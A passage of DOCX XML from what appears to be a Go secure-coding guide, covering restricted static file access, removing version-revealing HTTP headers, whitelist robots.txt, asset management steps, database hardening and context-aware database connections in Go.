        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note that our application is only allowing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>tmp/static/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> path to be displayed. When we try to access our protected file directly, we get this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4261104" cy="877824"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="password not shown" id="15" name="safe.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="password not shown" id="0" name="safe.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4261104" cy="877824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And if we try to list our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>test/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> folder to get a directory listing, we are also shown the same error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="2734056" cy="932688"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="no listing" id="16" name="safe2.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="no listing" id="0" name="safe2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2734056" cy="932688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="71" w:name="Remove_Disable_what_you_don_t_need"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Remove/Disable what you don't need</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>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0"/>
        </w:rPr>
        <w:t>aka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Response Headers should also be checked. Remove the headers which disclose sensitive information like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>OS version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Webserver version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Framework or programming language version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="2606040" cy="694944"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Example of version disclosure on HTTP headers" id="17" name="headers_set_versions.jpg"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Example of version disclosure on HTTP headers" id="0" name="headers_set_versions.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2606040" cy="694944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">w.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"X-Request-With"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Go Vulnerable Framework 1.2"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">w.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Access-Control-Allow-Methods"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"POST, GET"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don't worry about disabling things like WebDAV. If you want to implement a WebDAV server, you need to </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>import a package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="72" w:name="Implement_better_security"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Implement better security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep security in mind and follow the </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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5" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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2"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a direction file and </w:t>
        <w:t>NOT</w:t>
        <w:t xml:space="preserve"> a security control. Adopt a white-list approach as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User-agent: *
Allow: /sitemap.xml
Allow: /index
Allow: /contact
Allow: /aboutus
Disallow: /
</w:t>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73" w:name="Asset_Management_System_"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Asset Management System:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Asset Management System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not a Go specific issue, a short overview of the concept and its practices are described in the following section.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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0"/>
        </w:rPr>
        <w:t>Assets</w:t>
      </w:r>
      <w:r>
        <w:t>, we are not only talking about the system's components but also its software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The steps involved in the implementation of this system are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Establish the importance of information security in business.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Define the scope for AMS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Define the security policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Establish the security organization structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Identify and classify the assets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Identify and assess the risks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Plan for risk management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Implement risk mitigation strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Write the statement of applicability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Train the staff and create security awareness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor and review the AMS performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Maintain the AMS and ensure continual improvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A more in-depth analysis of this implementation can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="74" w:name="Database_Security"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Database Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>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96" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>database/sql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> package. This means that you need to register your SQL driver (eg: </w:t>
      </w:r>
      <w:hyperlink r:id="rId97" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>MariaDB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>sqlite3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>) when using database connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="75" w:name="The_best_practice"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>The best practice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Before implementing your database in Go, you should take care of some configurations that we'll cover next:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Secure database server installation</w:t>
      </w:r>
      <w:hyperlink w:anchor="1__MySQL_MariaDB_have_a_program_for_this__mysql_s___" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:bookmarkStart w:id="76" w:name="1"/>
          <w:t>1</w:t>
          <w:bookmarkEnd w:id="76"/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change/set a password for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account(s).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accounts that are accessible from outside the localhost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Remove any anonymous-user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Remove any existing test database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Remove any unnecessary stored procedures, utility packages, unnecessary services, vendor content (e.g. sample schemas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Install the minimum set of features and options required for your database to work with Go.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Output Encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> sections of this guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>This basically can be adapted to any programming language when using databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0 Block"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="77" w:name="1__MySQL_MariaDB_have_a_program_for_this__mysql_s___"/>
      <w:pPr>
        <w:pStyle w:val="Para 18"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>1</w:t>
        <w:t xml:space="preserve">. MySQL/MariaDB have a program for this: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>mysql_secure_installation</w:t>
      </w:r>
      <w:hyperlink r:id="rId99" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="78" w:name="Database_Connections"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Database Connections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="79" w:name="The_concept"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
      </w:pPr>
      <w:r>
        <w:t>The concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>sql.Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not return a database connection but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>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0"/>
        </w:rPr>
        <w:t>rule of thumb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the context variant of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>database/sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interface (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>QueryContext()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) should always be used and provided with the appropriate </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Context</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>From the official Go documentation "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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"context"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"database/sql"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"time"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    _ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"github.com/go-sql-driver/mysql"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> program </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    base context.Context
    cancel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">()
    db *sql.DB
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    db, err := sql.Open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"mysql"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"user:@/cxdb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        log.Fatal(err)
    }
    p := &amp;program{db: db}
    p.base, p.cancel = context.WithCancel(context.Background())
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Wait for program termination request, cancel base context on request.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">() {
        osSignal := </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;-p.base.Done():
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
